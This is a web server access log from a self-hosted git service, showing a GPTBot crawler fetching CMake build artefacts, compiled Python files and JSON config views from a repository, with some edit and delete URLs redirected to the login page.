GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 7690] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:16:54:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 10011] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:16:54:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 321] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:16:54:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10021] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:16:54:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 10012] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:16:54:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10019] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:16:54:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10030] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:16:54:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 449] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:16:54:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13921] [Gzip 8.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:16:54:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 224] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:16:54:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 2693] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:16:54:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 10113] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:54:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api" +[17/Feb/2026:16:54:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10655] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:54:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10303] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:16:54:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 10978] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:16:54:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 11011] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:16:54:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 11013] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:16:54:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/appsettings.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/appsettings.json" +[17/Feb/2026:16:54:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/appsettings.json" +[17/Feb/2026:16:54:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/appsettings.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/appsettings.json" +[17/Feb/2026:16:54:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/appsettings.json" +[17/Feb/2026:16:54:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/appsettings.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/appsettings.json" +[17/Feb/2026:16:54:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/appsettings.json" +[17/Feb/2026:16:54:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11691] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:16:54:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 9932] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake" +[17/Feb/2026:16:54:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11692] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:16:54:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14320] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:16:54:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12778] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:16:54:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 35740] [Gzip 10.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:16:54:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11350] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:16:54:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13733] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:16:54:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9973] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:16:54:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13610] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:16:54:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:16:54:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 10005] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:16:54:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11691] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:16:54:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11693] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:16:54:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14602] [Gzip 9.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:16:54:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 2101] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:16:54:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 9986] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:16:54:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 9990] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:16:54:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12465] [Gzip 6.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:16:54:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 964] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:16:54:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 9988] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:16:54:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 46766] [Gzip 22.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:16:54:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 22369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:16:54:32 +0000] - 200 200 